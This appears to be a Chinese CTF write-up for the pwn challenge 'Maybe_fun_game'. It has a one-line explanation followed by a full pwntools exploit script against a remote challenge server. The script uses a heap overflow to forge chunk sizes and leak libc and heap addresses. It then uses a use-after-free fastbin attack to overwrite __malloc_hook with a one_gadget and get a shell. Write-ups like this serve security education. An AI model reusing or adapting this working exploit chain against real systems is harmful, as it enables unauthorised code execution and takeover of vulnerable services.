……会逆向就会做;
Maybe_fun_game
存在堆溢出和UAF,利用堆溢出修改chunk大小,让他进入unsorted bin而不是top,切割泄漏libc地址,然后就是UAF打__malloc_hook
1 | from pwn import* |
2 | import base64 |
3 | #context.log_level = 'DEBUG' |
4 | def get_argv(recv_string,string): |
5 | #gdb.attach(p,"b *(0x555555554000+0x1348)") |
6 | p.sendafter(recv_string,base64.b64encode(p32(0x12345678)*2 + p64(0x30) + p64(8) + p64(0x8) + 'A'*8 + string)) |
7 | def Create(size,content): |
8 | get_argv('Pg==','1') |
9 | get_argv('emUgPj4=',str(size)) |
10 | get_argv('bnQgPj4=',content) |
11 | def Free(): |
12 | get_argv('Pg==','2') |
13 | def Edit(content): |
14 | get_argv('Pg==','3') |
15 | get_argv('bnQgPj4=',content) |
16 | def View(): |
17 | get_argv('Pg==','4') |
18 | p = process('./main') |
19 | libc =ELF('./libc-2.23.so') |
20 | p = remote('8.140.179.11',13452) |
21 | Create(0x20,'FMYY') |
22 | get_argv('Pg==','1') |
23 | get_argv('emUgPj4=',str(0x1000)) |
24 | get_argv('Pg==','3') |
25 | #gdb.attach(p,"b *(0x555555554000+0xD10)") |
26 | payload = '\x00'*0x28 + p64(0x3A1) + '\x00'*0x378 + p64(0x21) + '\x00'*0x18 + p64(0x791) + '\x00'*0x788 + p64(0x781) |
27 | p.sendafter('bnQgPj4=',base64.b64encode(p32(0x12345678)*2 + p64(0xF30) + p64(8) + p64(0xF08) + 'A'*8 + payload)) |
28 | Create(0x20,'\x78') |
29 | View() |
30 | p.recvline() |
31 | data = base64.b64decode(p.recvline()) |
32 | libc_base = u64(data[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x68 #+ 0x100000000 |
33 | log.info('LIBC:\t' + hex(libc_base)) |
34 | Create(0x10,'\x10') |
35 | View() |
36 | p.recvline() |
37 | data = base64.b64decode(p.recvline()) |
38 | heap_base = u64(data[-6:].ljust(8,'\x00')) - 0xA10 |
39 | log.info('HEAP:\t' + hex(heap_base)) |
40 | |
41 | get_argv('Pg==','3') |
42 | p.sendafter('bnQgPj4=',base64.b64encode(p32(0x12345678)*2 + p64(0) + p64(0x68) + p64(0x68) + 'A'*8 + 'FMYY' + '\n')) |
43 | |
44 | |
45 | Create(0x60,p64(libc_base + libc.sym['__malloc_hook'] - 0x23)) |
46 | Create(0x60,'FMYY') |
47 | Create(0x60,'FMYY') |
48 | Create(0x60,'FMYY') |
49 | get_argv('Pg==','3') |
50 | p.sendafter('bnQgPj4=',base64.b64encode(p32(0x12345678)*2 + p64(0x50) + p64(0x8) + p64(0x28) + 'A'*8 + '\x00'*0x13 + p64(libc_base + 0xF1207) + '\n')) |
51 | |
52 | p.interactive() |